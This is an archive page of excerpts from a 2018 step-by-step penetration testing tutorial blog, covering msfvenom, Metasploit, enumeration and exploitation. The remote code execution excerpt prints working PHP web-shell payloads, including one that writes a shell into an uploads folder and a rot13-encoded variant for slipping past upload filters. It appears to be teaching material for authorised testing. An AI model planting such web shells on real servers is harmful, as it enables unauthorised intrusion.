[ Pen Testing ] Archives – Page 2 of 2

December 3, 2018

[ Pen Testing ] :: Step by Step: msfvenom

Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter: msfvenom to get a syntax page. View a list of payloads: msfvenom -l payloads Create the reverse …

Continue reading “[ Pen Testing ] :: Step by Step: msfvenom”

December 3, 2018

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Remote Code Execution RCE PHP RCE Test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET[“c”]); ?> <?php `$_GET[“c”]`; ?> Upload a file: <?php file_put_contents(‘/var/www/html/uploads/test.php’, ‘<?php system($_GET[“c”]);?>’); ?> Evade file-type upload filters using rot13 + urlencode: <?php $payload=”%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E”; file_put_contents(‘/var/www/html/uploads/testfile.php’, str_rot13(urldecode($payload))); ?> RCE via webshell Pentest Monkey has …

Continue reading “[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)”

December 3, 2018

[ Pen Testing ] :: Step by Step: Burp Suite

Burp Suite Start with the basics: https://www.cybrary.it/s3ss10n/s3ss10n-wednesday-burp-suite-basics/ Use Burp to Test for Path Traversal Vulnerabilities https://support.portswigger.net/customer/en/portal/articles/2590663-using-burp-to-test-for-path-traversal-vulnerabilities

December 3, 2018

[ Pen Testing ] :: Step by Step: Metasploit and Armitage

Metasploit and Armitage Starting Metasploit Generic Metasploit installation instructions for any OS: https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework Instructions for starting Metasploit in Kali: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali The default install of Metasploit that comes with Kali needs to be initialized. service postgresql start msfdb init # only if necessary Starting msfconsole msfconsole Once msfconsole is running: msf>db_status # check database status # …

Continue reading “[ Pen Testing ] :: Step by Step: Metasploit and Armitage”

November 28, 2018

[ Pen Testing ] :: Step by Step: Post-Exploitation

Post-Exploitation Now we’re in, and it’s time to expand our powers. Post-Exploitation in Windows CrackMapExec is our most excellent friend here. It’s a Windows/Active Directory exploration/exploitation tool that lets us walk their domain and machines and do whatever we damn well wanna. And it’s current as of this writing (2018). Here’s a really good walk-through: …

Continue reading “[ Pen Testing ] :: Step by Step: Post-Exploitation”

November 28, 2018

[ Pen Testing ] :: Step by Step: Exploitation

Exploitation BOF (buffer overflow) Exploits Buffer overflows are pretty technical, but eventually you’ll find yourself using them. In most cases you’ll copy or create code and encode it into a shellcode exploit. Review and correct the initial pre for configurable variables. Pay special attention to removing all badchars. Which characters are bad depends heavily on …

Continue reading “[ Pen Testing ] :: Step by Step: Exploitation”

November 28, 2018

[ Pen Testing ] :: Step by Step: Enumeration

Enumeration Okay, by now you’ve spent hours, days or weeks stealthily footprinting your scope. Since this is pen testing, you’ve been mighty careful not to exceed your scope, right? So let’s talk tools and techniques. See https://security.stackexchange.com/questions/168247/reduce-noise-when-penetration-testing for an extensive list of tools. LinEnum https://github.com/rebootuser/LinEnum Local Linux Enumeration & Privilege Escalation Cheatsheet: an item-by-item list …

Continue reading “[ Pen Testing ] :: Step by Step: Enumeration”

November 28, 2018

[ Pen Testing ] :: Step by Step: Reconnaissance

Reconnaissance In this “passive” phase of a pen test, the tester will be exploring the scope of their pen test contract. This may be an IP range, a domain, a company or anything else with digital assets. In a real pen test, you can’t expect to make a lot of noise and be ignored, not …

Continue reading “[ Pen Testing ] :: Step by Step: Reconnaissance”

November 28, 2018

[ Pen Testing ] :: Step by Step: Prepping a Fresh Kali Install for Action

Initial Tasks for a New Kali Install # Run these commands to make sure your Kali box is # truly up-to-date: apt-get update apt-get upgrade apt-get upgrade –fix-missing apt-get distupgrade # You WILL need git: apt-get install git # Edit /root/.bash_aliases, for example a handy # ls command shortcut: # Remember to do this for …

Continue reading “[ Pen Testing ] :: Step by Step: Prepping a Fresh Kali Install for Action”

November 27, 2018

[ Penetration Testing Step by Step ]

Table of Contents [[ This course requires registration. Use the Register link above. We do not share ANY information with ANYBODY. ]]